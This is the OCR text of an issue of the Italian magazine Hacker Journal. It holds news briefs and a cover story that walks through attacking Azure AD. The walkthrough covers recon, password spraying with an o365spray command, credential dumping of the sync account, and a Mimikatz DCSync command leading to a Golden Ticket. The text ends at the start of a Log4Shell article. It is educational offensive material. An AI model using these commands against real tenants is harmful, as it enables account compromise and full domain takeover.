MALWARE

maggio

DA CYBERGUERRA
N.262

L’analisi dettagliata dei tool distruttivi

usati dalla Russia per attaccare l’Ucraina
www.hackerjournal.it

Dal 2002 tutto quello che gli altri non osano dirti

L’offuscamento
ha fallito
Usi la pixellatura o
la sfocatura per nascondere
i tuoi segreti? È tutto inutile!

Sgama
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

i numeri nascosti
Il trucco per scoprire l’identità
di chi ti telefona con l’anonimo

Annichilire

L’hacker
il cloud Le tecniche dei cybercriminali per identificare e bucare le istanze
di Azure, la nuvola di Microsoft, e impossessarsi dei nostri dati
folle senza
un dito
La storia del criminale
russo che ha diffuso
Gigabyte di dati
pentesting
Scopri lo script usato dai pirati per
accesso (in)sicuro
L’autenticazione a due fattori
sottratti con il enumerare gli utenti di un server è a prova di cracker... Ops, no.
ransomware bucato con il log poisoning L’hanno bucata ed è colpa tua
 IN EDICOLA
DAL 19 APRILE

Scansiona il QR Code

Acquistala su www.sprea.it/glorierock
versione digitale disponibile dal 16 aprile
 EDITORIALE
www.hackerjournal.it
In questo numero parliamo di:
Microsoft Azure, reverse shell,
tracciamento degli smartphone,
malware, wiper, ransomware, debolezze
della doppia autenticazione, pixelling,
telefonate moleste e molto altro.

P
romozione della sicurezza informatica.
Ne ha parlato anche il Presidente della
Repubblica, Sergio Mattarella, in un
messaggio inviato al Prefetto Lamberto
Giannini, Capo della Polizia, in occasione del 170°
anniversario di fondazione della Polizia.
Nell’epoca che stiamo vivendo, nella quale
il cambiamento tecnologico e socioeconomico sembra
procedere a una velocità pazzesca, forse anche
eccessiva, la sicurezza informatica gioca un ruolo
chiave perché il digitale ormai tocca anche chi usa
ancora un feature phone e il green pass lo vuole solo
su carta. Il digitale è ovunque, eppure di strada dal
punto di vista culturale per capire come blindare
strumenti e dati personali ne dobbiamo fare ancora CONTATTI
tanta, ma davvero tanta. Un esempio? Come ci ha
REDAZIONE
svelato l’esperto di sicurezza Matteo Flora in un video
[email protected]
(www.youtube.com/watch?v=o7lg4IEOuvk), il
ABBONAMENTI
Ministero della Salute ha commesso una “leggerezza” E ARRETRATI
[email protected]
diffondendo una circolare contenente un link a un www.sprea.it/digital
form di segnalazione dei posti letto occupati per
FACEBOOK
Covid19 che, invece di essere compilabile solo da www.facebook.com/
hackerjournal/
ospedali e simili, era alla mercé di chiunque avesse
quel link... Non ci resta che augurarvi buona lettura. SITO WEB
www.hackerjournal.it
 Il prossimo num ero sara
o
in edicola dal 3 giugn

SOMMARIO ABBONATI ALLA

VERSIONE DIGITALE
SOLO PER PC E MAC
A SOLI 19,90 €
DURATA ABBONAMENTO: 1 ANNO
www.hackerjournal.it/abbonamenti

HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker................................................................ 06

COVER STORY
Annichilire il cloud
Le tecniche dei cybercriminali per identificare e bucare le istanze

di Azure, la nuvola di Microsoft, e impossessarsi dei tuoi dati.............................. 10

Vulnerabilità | Una reverse shell dai log

Il bug Log4Shell consente a chiunque di prendere il controllo di una macchina
su cui è presente un applicativo Java..............................................................................18

NOI RISPETTIAMO L’AMBIENTE!

Hacker Journal è stato stampato
su carta certificata PEFC, proveniente
da piantumazioni a riforestazione programmata
e perciò gestite in maniera sostenibile

M IGL IORARE
A
P
I
RU
ETA
F
C
E I
R A
I TA!
A T UA R I V ISTA
L .ly/hackerjo
://bit
urnal
Vai su https questionario anonimo
e compila il
 4
 Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”

SICUREZZA Wiper
Sorveglianza Wi-Fi | Monitorati e schedati
Seconda parte del progetto di creazione di un tracciatore per smartphone.... 22

Wiper | Nuovi malware da cyberguerra

Analisi dettagliata dei tool distruttivi usati dalla Russia per attaccare l’Ucraina..... 26

2FA | la doppia autenticazione è bacata

Un attacco che sta colpendo molti utenti in Rete e che causa danni gravi........... 34 > 26
Pentesting | Attacco a dizionario
Progettiamo un dictionary attack calibrato su una Web app reale!................. 36

44
HOW TO
Pixelling | Testi pixellati, ora craccati!
Proteggere i propri segreti pixellando le immagini non è più un metodo sicuro.... 44

Scocciatori | Come rendere visibile un numero privato

Ecco il modo per “smascherare” chi effettua telefonate con il prefisso #31#....... 48

Filesystem | Alla scoperta di NTFS, terza parte PIXELLING

Vediamo come il filesystem NTFS, tipico di Windows, conserva i file....................... 52

> 58
HACKULTURE
Hack e follia | L’hacker folle senza anulare
Dietro al nick Wazawaka si cela uno dei più importanti criminali nell’ambito
del ransomware che adesso sembra essere completamente impazzito............... 58

tt o ri , le risposte de lla redazione > 60

Le do m a n d e d e i le
POSTA
 HACKTUALITÀ

NLETETURW
E
S Quando hacke
rano
li...
i cybercrimina
#LEAK Su Twitter sono finiti documenti interni e chat della gang
ransomware Conti. Ora sappiamo quali strumenti usano

C on un fatturato stimato di quasi 200 milioni di dollari, la gang Conti,

specializzata in attacchi basati su ransomware, è uno dei gruppi di
cybercriminali più attivi negli ultimi anni. Scoperta nel 2020, questa gang
sembrerebbe operare dalla Russia. Ebbene, dopo aver colpito decine
e decine di obiettivi, sono caduti loro stessi vittima di un ricercatore
ucraino indipendente (o forse di un leak interno), come indica un’analisi
effettuata dagli esperti di Akamai Security. Difatti, il 27 febbraio 2022
è stato creato il profilo Twitter @contileaks che ha iniziato a diffondere
documenti interni e log di chat del gruppo, così come gli indirizzi di alcuni
dei loro server interni e il codice sorgente dei tool che utilizzano.
PRACTICAL HARDWARE
Scopriamo così che per raggiungere i suoi obiettivi, la gang Conti ricorre
PENTESTING
a vari strumenti, la maggior parte dei quali non è di sua produzione. Solo
Abbandoniamo per una volta crypter, trojan e injector sembrano essere proprietari; per il movimento
il mondo del software laterale, la propagazione e l’esfiltrazione sembra invece usare una serie
per dedicarci all’attacco di strumenti che dovrebbero essere familiari a chiunque sia nei red e blue
dell’hardware. È ciò che team: Cobalt Strike, Mimikatz e PSExec, per citarne alcuni. Sono stati
impareremo leggendo questo diffusi anche manuali con esempi concreti e guide sull’implementazione
volume di 382 pagine, divise del movimento laterale e tante altre informazioni sul loro modo di operare.
in 14 capitoli e in lingua
inglese. Scopriremo come
identificare ogni singolo
componente di un dispositivo
hardware, costruiremo pezzo
per pezzo un laboratorio
per eseguire il pentest in
sicurezza e poi inizieremo
ad hackerare protocolli
hardware, firmware, porte,
interfacce di debug e tanto
altro. Infine capiremo anche
come realizzare un report
sulle vulnerabilità trovate.
https://amzn.to/3EegIEE

 6
 NEWS
Attacco remoto contro Hanno chiuso
IL FORUM
le stampanti HP DEI CRACKER
#BUG Sono usciti alcuni CVE relativi a dispositivi di stampa #SEQUESTRO Dopo anni
buggati dell’azienda americana di attività, il noto RaidForums
è stato blindato dalle autorità

H P ha pubblicato alcuni avvisi di

L
sicurezza per delle vulnerabilità di
e forze dell’ordine statunitensi
gravità critica che interessano centinaia
ed europee hanno preso
di modelli di stampanti LaserJet Pro,
il controllo di un popolare forum
Pagewide Pro, OfficeJet, Enterprise,
Large Format e DeskJet. Il primo in cui gli hacker hanno pubblicizzato
bollettino avverte di un bug di buffer per anni dati rubati a consumatori
overflow che potrebbe portare e aziende americane e internazionali.
all’esecuzione di codice in modalità remota Il dominio è stato sequestrato dall’FBI,
sul computer interessato. Tracciato come dai servizi segreti, dal dipartimento
CVE-2022-3942, il problema è stato segnalato di giustizia degli Stati Uniti e da altre
dal team Zero Day Initiative di Trend Micro. forze dell’ordine, come si legge
“Alcuni prodotti HP Print e Digital Sending possono essere vulnerabili in un avviso apparso sulla homepage
alla potenziale esecuzione di codice in modalità remota e al buffer di RaidForums e nel comunicato
overflow con l’uso di Link-Local Multicast Name Resolution”, si legge
all’URL https://bit.ly/hj262_forum.
nell’avviso (https://bit.ly/hj262_hp).
Questo forum underground, nato
nel 2015, era noto per il suo mercato
dei leak ed era, a quanto pare,
amministrato da un ragazzo

Il malware di ventuno anni, portoghese.

che abbatte le
infrastr utture
critiche

#MINACCIA Mandiant presenta una nuova

ricerca su un insieme di strumenti di “attacco
informatico eccezionalmente rari e pericolosi”,
denominati “INCONTROLLER”
INCONTROLLER, questo è il malevolo protagonista
della ricerca che Mandiant ha pubblicato all’URL
https://www.mandiant.com/resources/incontroller-
state-sponsored-ics-tool. Questa soluzione include
tre strumenti che consentono all’attaccante di inviare
istruzioni a una varietà di diversi dispositivi inerenti
al sistema di controllo industriale (ICS), incorporati
in differenti tipologie di macchinari in diverse industrie
critiche (per esempio le centrali elettriche, fresatrici,
presse industriali utilizzate in molti differenti settori
produttivi, ecc). È possibile che ogni strumento possa
essere utilizzato indipendentemente, o che l’attaccante
possa utilizzare i tre strumenti insieme per attaccare
un singolo ambiente. L’autore della ricerca evidenzia
che la funzionalità di INCONTROLLER “è coerente con
il malware utilizzato nei precedenti attacchi informatici
da parte della Russia”.

7 
 HACKTUALITÀ

REVIL È KO?
BEH, ORA C’È
BLACKCAT
#RANSOM Un nuovo
gruppo di cybercriminali
è nato dalle ceneri
di BlackMatter e REvil

N el nuovo report A bad luck BlackCat, i ricercatori di Kaspersky rivelano i dettagli di due incidenti cyber
condotti dal gruppo di criminali informatici ransomware BlackCat. La complessità del malware utilizzato,
unita alla vasta esperienza degli attori coinvolti, ha trasformato questo nuovo gruppo in uno dei player più
influenti nell’attuale mercato dei ransomware. Tecniche e strumenti usati dal gruppo durante gli attacchi
confermano il collegamento tra BlackCat e altri gruppi noti come BlackMatter e REvil. In uno dei casi rivelati nel
report, il gruppo criminale ha attaccato i sistemi cloud delle vittime sfruttando le vulnerabilità degli asset condivisi
online. Inoltre, in questo caso, il gruppo ha anche rilasciato un file batch Mimikatz, insieme a file eseguibili e utility
di recupero password di rete Nirsoft. Insomma, come spieghiamo nell’articolo di copertina di questo numero,
il cloud è da maneggiare con molta cura. Per informazioni: https://securelist.com/a-bad-luck-blackcat/106254/

O V E L O C I C O N LA PANDEMIA
N
LE FRODI CORRO
#REPORT Uno studio di Kroll ha registrato un forte incremento
del phishing e delle frodi informatiche durante la pandemia

Kroll (www.kroll.com) ha presentato un nuovo report realizzato in

collaborazione con The Internal Audit Foundation (IAF) e The Institute
of Internal Auditors (IIA). Lo studio, intitolato “Le frodi e la pandemia
– L’audit interno evolve per affrontare la sfida” (https://bit.ly/
hj262_kroll), riporta che il cambiamento delle modalità di lavoro
e il passaggio improvviso al lavoro da remoto hanno fornito nuove
opportunità a truffatori e criminali informatici. Le organizzazioni
hanno dovuto affrontare una maggiore esposizione ad attacchi
informatici, di social engineering e di phishing, nonché a casi di furti
d’identità di alti dirigenti al fine di appropriarsi indebitamente di fondi.
Negli ultimi due anni, oltre la metà (il 54%) degli intervistati ha notato
un aumento degli attacchi informatici e di truffe tramite phishing,
mentre il 40% ha registrato un aumento delle frodi relative
all’appropriazione indebita di beni aziendali.

 8
HA C K T U A L I TA À
cover story Annichilire il cloud
Le tecniche dei cybercriminali per identificare e bucare le istanze
di Azure, la nuvola di Microsoft, e impossessarsi dei nostri dati...................................................... 10

Vulnerabilita Una reverse shell dai log

Il bug Log4Shell consente a chiunque di prendere il controllo di una macchina
su cui è presente un applicativo Java....................................................................................................... 18
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic

Annichilire
il cloud
GLOSSARIO
DI BASE
SOC
Il Security Operations Center
è un centro da cui vengono
forniti servizi finalizzati
alla sicurezza dei sistemi
Le tecniche dei cybercriminali per
informativi dell’azienda stessa
(si dice che il SOC è interno)
identificare e bucare le istanze
o di clienti esterni. In questo
secondo caso il SOC è usato
di Azure, la nuvola di Microsoft,
per erogare Managed
Security Services (MSS)
e impossessarsi dei nostri dati
e l’azienda che li eroga è
chiamata Managed Security
Service Provider (MSSP).

DOMAIN CONTROLLER
È il server che si occupa delle
richieste di autenticazione
all’interno di un dato dominio.

DOMINIO
Un dominio è una rete di
computer, di solito una LAN di
un’organizzazione (azienda,
ente pubblico, scuola/
università), nella quale
la logica client-server
è supportata, oltre che da
connessioni fisiche e relativi
protocolli, anche da regole
(dette policy) di connessione
logica di tipo autorizzativo
(regole di sicurezza).

IAAS
Infrastructure as a Service
è un’attività in cui un fornitore
di servizi informatici permette
agli utenti di creare piani
personalizzati per la creazione
di un’infrastruttura cloud
dinamica e scalabile che
comprende risorse di calcolo,
CPU, RAM, connessioni
di rete, dischi e tutto ciò che
In collaborazione con
è necessario per la creazione
di macchine virtuali. thehackingquest.net

 10
 Scegliere una soluzione cloud a volte vuol dire
preferire la comodità alla sicurezza e alla privacy.
E forse alla lunga lo si paga se i sistemi non sono
“blindati” in modo adeguato...
O
rmai la moda del cloud
è uno stile IT sdoganato in tutto
il mondo. Il termine significa
“nuvola” e identifica una rete
informatica che mette a disposizione
innumerevoli servizi attraverso la rete
Internet, disponibili da remoto sotto forma
di architettura distribuita. Contrariamente
a quanto si pensa, il cloud computing non
è così recente. I primi “Comunicator” erano
terminali dotati solo di schermo e tastiera
dove i dati venivano inviati a un centro
di calcolo remoto [figura #1].
IL CLOUD HA I NOSTRI DATI
Il buon senso dovrebbe guidarci su un
semplice paradigma: “I miei dati sono
in mano a sconosciuti”. A oggi, la maggior
parte dei nostri dati è in mano a
“sconosciuti”: chiamate, foto, posizioni,
agende, appuntamenti, spostamenti, numero
di volte in cui clicchiamo sullo schermo,
perfino ciò che si dice finisce sul cloud
e dato in pasto alle IA che ci profilano per poi
proporci le più svariate pubblicità. Persino
aziende di cyber sicurezza pagano stati esteri
per fare da SOC ad aziende italiane,
figura #1
ma poiché servono sempre il “dio denaro”,
sono destinate a restare sempre un passo
indietro, azzoppate dagli idoli che loro stesse
servono e venerano. La verità è che anche
molti esperti del settore tendono a credere
che sia possibile demandare a terzi la
gestione della propria infrastruttura non
dovendosi preoccupare, per esempio, di tutti
quei problemi tecnici legati alla cyber
sicurezza. Generalmente “non assumersi le
proprie responsabilità” non è mai una grande
idea. Non dico che il cloud sia di per sé
sbagliato, dico solo che andrebbe utilizzato
attentamente applicando ancora più
accortezze di quante ne useremmo
per il nostro ambiente “on-premises”.
KERBEROS
Il protocollo di autenticazione di Microsoft
fu sviluppato al Massachusetts Institute
of Technology (MIT) e prende il nome dal
mitologico mastino a tre teste a guardia
dell’ingresso degli inferi, su cui regnava
il dio Ade. Ognuna delle teste era in grado
di scorgere il passato, il presente e il futuro.
Il protocollo consente a due parti (per
esempio un client e un server) di autenticarsi
a vicenda su un canale di rete non
sicuro. Entrambe le parti coinvolte
fanno riferimento a una terza
parte che fa da “garante” tra le
due: il server Kerberos. Da qui
il nome del protocollo che vede
coinvolte tre parti:
• il KDC (Key Distribution Center);
• il client che richiede l’accesso;
• il servizio di cui il client sta
tentando di ottenere l’accesso.
Ecco un terminale DEC VT100, collegato “in remoto”
al computer vero e proprio, introdotto nel mercato
nel 1978. Fonte: https://it.wikipedia.org/wiki/
Terminale_(informatica)
11 
 HACKTUALITÀ
hilire il clo
COVER STORY: Annic
GLOSSARIO
DI BASE
SAAS
Software as a Service
è un modello di servizio
del software applicativo dove
un produttore di software
sviluppa, opera e gestisce
un’applicazione Web,
mettendola a disposizione dei
propri clienti via Internet (con
una formula di abbonamento).
RECORD TXT
Un record TXT è un tipo
di record DNS usato per
associare del testo arbitrario
a un hostname, come
informazioni su un server,
una rete, un centro dati o altre
informazioni contabili.
RECORD MX
Un Mail eXchanger record è
un tipo di risorsa nel DNS che
specifica un server di posta
elettronica autorizzato ad
accettare messaggi email
per conto del dominio
di destinazione.
AZURE AD CONNECT
Applicazione Microsoft
che consente di “unire”
la gestione dell’identità
dell’utente on-premise e sul
cloud. In pratica, tra le altre
cose, sincronizza gli hash
delle password tra un’Active
Directory locale e quella
sul cloud, sincronizza
gruppi, utenti, ecc.
DPAPI
Data Protection API è una
semplice interfaccia
di programmazione di
applicazioni crittografiche
disponibile come componente
integrato in Windows 2000
e versioni successive
dei sistemi operativi
Microsoft Windows.
 12
ud
Schema di
funzionamento di
massima di un
Domain
Controller.
figura #2
FLUSSO DI AUTENTICAZIONE soddisfa certi requisiti, lo ottiene e lo
Il “garante” che abbiamo citato in ripresenta al “garante” assieme alla
precedenza, in un’infrastruttura richiesta del servizio a cui desidera
di rete è rappresentato dal Domain accedere. Il garante gli risponde
Controller (DC). Per assolvere al suo fornendogli un lasciapassare
scopo il DC ottempera anche altri (Service Ticket) che potrà utilizzare
ruoli: Authentication Server (AS) per autenticarsi al servizio. Il sistema
e Ticket Granting Service (TGS). centralizzato, cuore di Windows
Vediamo adesso quale è il flusso Server, che si fonda sui concetti di
di autenticazione [figura #2]. Dominio e di Directory e che poggia
1 Il Client invia una richiesta di le sue fondamenta sull’autenticazione
ticket-granting-ticket (TGT) all’AS. Kerberos, è chiamato Active
La richiesta contiene: timestamp Directory. Azure Active Directory
criptato più hash NT dell’utente. (Azure AD) è il servizio in cloud
2 Se l’AS decripta il messaggio, di Active Directory basato su IaaS
invia al client il TGT. (Infrastructure as a Service). Creiamo
3 Il client, una volta ottenuto il TGT, adesso il nostro ambiente Azure.
può inviare al TGS il suo TGT
più il dettaglio del servizio REGISTRAZIONE
a cui vuole accedere. Prima di impostare il nostro
4 Il TGS risponde con il Service Ticket ambiente Azure AD, è necessario
più la Session Key. registrarsi al seguente link: https://
5 Il client adesso può autenticarsi azure.microsoft.com/en-us/free/
utilizzando
il Service Ticket.
In poche parole, figura #3
il client chiede
al “garante”
un biglietto di
riconoscimento
(TGT). Se il client
Il primo passo
nella creazione del
nostro tenant
 figura #4 figura #5

Controlliamo i dati inseriti

e premiamo Create se sono
tutti corretti. Creeremo così
Schema di funzionamento di un attacco Password
il nostro tenant.
Spray, pensato per non mandare in blocco la
procedura di login del servizio attaccato.

cliccando su Start Free. Clicchiamo poi su
Create Account. Una volta loggati con il nostro
account, ci ritroveremo di fronte alla schermata
Create Your Azure free account dove
dovremo compilare i vari campi.
CREAZIONE DI UN NUOVO TENANT
Un tenant Azure AD è un’istanza specifica di
Azure AD che include account e gruppi.
1 Nel menu di ricerca digitiamo Azure Active
Directory e clicchiamo su Create [figura #3]
2 Nel menu Configuration inseriamo:
• il nome dell’Organizzazione: hack3rjournal
• il nome del nostro Dominio: hackerjournal
• infine la regione: Italy
3 Spostiamoci nella scheda Review + Create
e confermiamo i dati, selezionando il pulsante
Create in basso a sinistra [figura #4].
Complimenti, abbiamo appena creato il nostro
primo tenant di Azure AD! Per crearlo abbiamo
usato il dominio hack3rjournaloutlook.
onmicrosoft.com.
le informazioni contenute nei record TXT e MX.
Microsoft ha due opzioni per validare il dominio.
1 Un TXT record che contiene il valore
MS=<numero a caso> con un TTL di 3.600 secondi.
2 Un MX record con priorità alta: ms<numero a
caso>.msv1.invalid con un TTL di 3.600 secondi.
Nel nostro caso, la data organizzazione utilizza
Azure AD con applicazioni Software as a Service
(SaaS). L’attaccante può verificarlo dai record
MX e TXT del DNS o dai “federation records”
come: adfs.targetdomain.com, sso.
targetdomain.com, sts.targetdomain.com.
I campi che dovremo cercare e che indicano la
presenza di Azure AD sono, per esempio:
figura #6

AZURE RECONNAISSANCE
Supponiamo adesso che il nostro obiettivo sia
attaccare il dominio appena creato. Una delle
fasi più importanti di un attacco è la raccolta di
informazioni sul target. Abbiamo appena visto
che impostando un tenant di Azure AD viene
creato automaticamente il dominio <nome del
tenant>.onmicrosoft.com. Il primo passo sarà
quello di richiedere i record DNS e identificare Lo script per l’attacco alle password in esecuzione.

13 
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic
• il record *.mail.protection.outlook.com;
• il record MS=ms76565273.
Ma c’è un altro modo per verificare se una data
organizzazione sta utilizzando Azure: possiamo
navigare all’URL https://login.microsoftonline.
com/getuserrealm.srf?login=user@
<domain>&xml=1. Lo username può essere
quello che desideriamo e dobbiamo solamente
sostituire all’interno dell’URL il campo <domain>
con il nome del dominio della nostra vittima.
Per esempio: hac3rjournal.edu. Una volta che
avremo premuto Invio, ci apparirà la pagina
corrispondente con le seguenti informazioni:
<RealmInfo Success=”true”>
<State>6</State>
<UserState>2</UserState>
<Login>
[email protected]
</ per questo tipo di attacco. Le campagne di
Login>
<NameSpaceType>Managed</NameSpaceType>
<DomainName>hac3rjournal.edu</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>HACKER JOURNAL FAKE
SPA</FederationBrandName>
<CloudInstanceName>microsoftonline.com</
CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:
MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
Il campo che a noi interessa è il valore Managed
per il <NameSpaceType> che indica la presenza
di Azure AD e O365, che sta per Office 365 (altre
opzioni sono “Unknow” o “Federation”). Constatato
che l’organizzazione utilizza Azure AD, potremo
optare per un attacco Password Spraying.
 14
figura #7
Schermata
di login della
macchina
attaccata.
ATTACCO ALLE PASSWORD
Un brute-force attack cerca di ottenere un
accesso non autorizzato di un singolo account
facendo “guessing” della password, cioè cercando
di indovinarla. Questo approccio è inutilizzabile
poiché l’account sarebbe bloccato dopo un certo
numero di tentativi, che variano solitamente da
tre a cinque (e ne dovremmo fare molti di più).
Adottiamo un altro punto di vista: in un attacco di
tipologia “spray” proviamo una singola password
su molteplici account, e poi passiamo alla
successiva della lista. Questo attacco ci permette
di evitare frequenti e continui blocchi dell’account,
in quanto viene eseguito un singolo tentativo di
accesso per ogni utente. Dato che gli ambienti
cloud espongono pubblicamente i loro portali di
login, questi rappresentano un ottimo bersaglio
Password Spray prendono come target le Single-
Sign (SSO) e le applicazioni cloud che utilizzano
i protocolli di “federated-authentication”.
figura #8
Il logo di PowerZure, un tool PowerShell creato
per exploitare le risorse presenti su Microsoft
Azure.
USER ENUMERATION
La prima cosa da fare sarà quindi quella di
procurarci una lista di utenti su cui mettere
a segno il nostro Spray Attack. Per farlo abbiamo
diverse opzioni: una è quella di ottenere una lista
di dipendenti attraverso l’utilizzo di classiche
tecniche di OSINT (per esempio sfruttando
LinkedIn) e poi determinare il criterio con cui
l’organizzazione crea le sue email, come nome.
[email protected] oppure prima-lettera-
[email protected] [figura #5]. ricognizione; uno è quello di utilizzare uno script
ATTACK!
Una volta che la lista delle email target è pronta,
non ci resta che utilizzare uno script per portare
l’attacco. In questo esempio utilizzeremo
o365spray. Lo script in Python è scaricabile
su GitHub al seguente indirizzo: https://github.
com/0xZDH/o365spray. Per eseguirlo dovremo
dare allo script i permessi di esecuzione,
utilizzando il comando
chmod +x o365spray.py
Adesso potremo lanciare il nostro comando:
./o365spray.py --spray -U usernames.txt -p
Pass123! --count 2 --lockout 5 --domain
dominio.edu
Analizziamo il comando nel dettaglio [figura #6].
• ./o365spray.py: lanciamo il nostro script.
• --spray: scegliamo l’opzione per lanciare uno
Spray Attack.
• -U usernames.txt: la lista dei nostri username.
Le email degli utenti che abbiamo raccolto
precedentemente.
• -p Pass123!: la singola password che vogliamo
provare su tutti gli account.
• --count 2: il numero dei tentativi che vogliamo
effettuare (2).
• --lockout 5: Reset Time per la Lockout Policy,
Questa panoramica sulle tecniche d’attacco al cloud
è solo a scopo didattico. Attaccare sistemi altrui
senza permesso è reato, fate attenzione!
in minuti (5).
• --domain dominio.edu: il dominio che
vogliamo attaccare.
Una volta che avremo ottenuto le credenziali
di accesso al dominio, potremo decidere di
utilizzare vari tool per effettuare una ricognizione
interna della sua struttura.
AUTHENTICATED RECONNAISSANCE
Esistono diversi modi per effettuare la nostra
PowerShell che carpisce le user info, group
membership e company information.
La prima cosa che dovremo fare per utilizzarlo
è installare i moduli MsOnline. Apriamo
PowerShell con i privilegi di amministratore
e digitiamo i seguenti comandi:
Install-Module MSOnline
Install-Module -Name AzureAD
Una volta che i nostri moduli saranno installati,
scarichiamo il tool da GitHub al link https://github.
com/nyxgeek/o365recon. Estraiamolo in una
directory a scelta e, utilizzando sempre la nostra
Command Line Interface (CLI) di PowerShell,
navighiamo nella directory nella quale è presente
lo script. Avviamolo digitando il nome dello script,
preceduto da .\. Dopo un breve check dei moduli
installati da parte dello script, ci apparirà
la schermata di login [figura #7].
POST-EXPLOITATION
Effettuata la nostra ricognizione, dovremo
eseguire tutte quelle attività di pivoting
ed escalation (cioè spostarsi nella rete locale
e ottenere maggiori privilegi) necessarie per
raggiungere il nostro obiettivo. In questa fase
ci viene incontro PowerZure che ci aiuta a
identificare misconfiguration o privilegi non
assegnati correttamente. Le sue funzioni sono:
• Mandatory - operazioni da effettuare per prime;
15 
 HACKTUALITÀ ud
hilire il clo
COVER STORY: Annic
figura #9
• Operational - funzioni che innescano processi
su Azure;
• Information Gathering - raccolta d’informazioni;
• Secret Gathering - funzioni con l’obiettivo
di collezionare informazioni categorizzate
come “secret”;
• Data Exfiltration - funzioni per esfiltrare/
estrarre dati.
È possibile scaricare PowerZure al seguente link:
https://github.com/hausec/PowerZure [figura
#8]. In molti credono che una volta penetrati
all’interno di un sistema, l’attacco sia terminato.
In realtà siamo solo all’inizio. Vediamo adesso una
delle possibili strategie d’attacco che possiamo
impiegare per prendere il controllo completo e
mantenere la persistenza all’interno di Azure AD,
che ci permette di introdurre diversi concetti.
DCSYNC – ATTACKING PHS
L’attacco DCSync sfrutta il protocollo di replica
fra i domini per “imitare” il Domain Controller.
Se l’attacco ha successo, tutte le password nel
dominio sono compromesse. Il Password Hash
Synchronization (PHS) è l’account usato da Azure
AD Connect per sincronizzare la password hash
dell’Active Directory on-premises con quella
figura #10
di Azure AD. Riuscendo a prendere il controllo
di questo account possiamo attuare il “DCSync
 16
Scopriamo su quale macchina è in esecuzione
Azure AD Connect.
attack”. Quindi il nostro primo step sarà quello di
identificare su quale server è installato Azure AD
Connect: per farlo dobbiamo localizzare
l’account di sincronizzazione, denominato da
Microsoft MSOL_nnnnnnnnnn. Il campo
“Description” dell’account identifica la macchina
su cui è in esecuzione Azure AD Connect [figura
#9]. Ci basterà quindi utilizzare il seguente
comando, sfruttando il modulo di PowerShell
AD, per estrapolare il campo “Description”:
Get-ADUser -filter ‘name -like “Msol*”’
-Properties Description
Il nostro secondo passo nell’attacco sarà quello
di recuperare la password dell’account di
sincronizzazione dal Credential Manager
e decriptarla con le chiavi DPAPI (metodo
di crittografia utilizzato per i dati che non
vengono mai letti al di fuori dell’host che la
utilizza), per farlo abbiamo due possibilità:
1 Utilizzare uno script in PowerShell:
https://gist.github.com/xpn/
f12b145dba16c2eebdd1c6829267b90c
2 Utilizzare il tool adconnectdumo:
https://github.com/fox-it/adconnectdump
Entrambi sfruttano le chiavi DPAPI dal server
per la decriptazione. L’ultimo nostro passo sarà
Abbiamo ottenuto le credenziali d’amministratore
dell’AD di Azure… e con esse otteniamo il modo
di entrare in ogni servizio della rete.
quello di sfruttare il tool Mimikatz per l’attacco
di DCSync. Mimikatz è un tool Open Source
creato da Benjamin Delpy per dimostrare le
vulnerabilità del protocollo di autenticazione
di Microsoft. Fu creato nel 2007 ma è tutt’ora
un’arma efficacissima. Solitamente in una
struttura Active Directory, gli amministratori
di sistema configurano più di un Domain
Controller. Ognuno di essi possiede una copia
del database dell’Active Directory. Ogni
aggiornamento fatto all’interno del database
(tipo la creazione di un utente) deve essere
propagato fra gli altri Domain Controller.
L’insieme delle metodologie e dei protocolli
utilizzati per sincronizzare tale database prende
il nome di Active Directory Replication.
Il seguente comando di Mimikatz (senza
opzioni extra) seleziona automaticamente
il dominio e il Domain Controller, ed estrae
le credenziali dal Domain Controller attraverso
il protocollo di replica chiamato Directory
Replication Service Remote (DRSR).
mimikatz “kerberos::dcsync
/user:administrator”
A questo punto, il gioco è fatto poiché una volta
ottenute le credenziali dell’amministratore di
dominio, possiamo usare DCSync per connetterci
al Domain Controller ed estrarre le credenziali
“madri” del sistema di autenticazione Kerberos.
I dati possono essere utilizzati per creare un
Ticket Granting Ticket (TGT) “speciale”, chiamato
Golden Ticket. Il Golden Ticket prende il nome
dal film “La Fabbrica di Cioccolato” ed è il
biglietto d’oro che permette l’accesso completo
a tutte le meraviglie della Fabbrica.
Analogamente nell’Active Directory il Golden
Ticket è la “matrice” di tutti i Ticket che ci
permette di utilizzare i permessi massimi per il
massimo tempo, compromettendo l’account di
sistema denominato krbtgt. Quando l’attaccante
utilizza il Golden Ticket, la prima interazione è
una richiesta per ottenere il “Service Ticket” (fare
riferimento alla [figura #1]) denominata TGS-
REQ utilizzando il “Gold-Ticket Granting Ticket”.
Non avviene alcun invio di credenziali o AS-REQ/
AS-REP. In altre parole, equivale a presentarsi al
nostro “garante” (il Domain Controller) dicendo:
“Guarda il biglietto che possiedo: è quello con
i più alti permessi! Forniscimi quindi l’accesso
al servizio che desidero” [figura #10]. Finalmente
abbiamo compromesso il dominio e assicuratoci
il pieno controllo! Ma questo non è che solo un
assaggio degli attacchi che potremmo mettere
in atto per prendere il controllo e mantenere
la persistenza all’interno di Azure AD. Molti altri
attacchi sono possibili: Skeleton Key, Silver
Ticket, Pass-the-Hash, Token Forging, etc…
scrivete in redazione se volete saperne di più.
RACCOLTA
PDF
HACKER
JOURNAL
Acquista la raccolta
PDF digitale del 2021
9 numeri a soli 7,90 €
anziché 35,10 € vai su
www.hackerjournal.it/raccoltapdf2021
17 
 HACKTUALITÀ

GLOSSARIO
DI BASE
Una r e v e r s e
g
ESCAPE

l d a i l o
Per sequenza

sh e l
di escape si intende
una serie di caratteri
che si utilizza, in una
stringa di testo, per far
capire all’interprete
Sh el l co ns en te a ch iunque di prendere
che quello che si sta
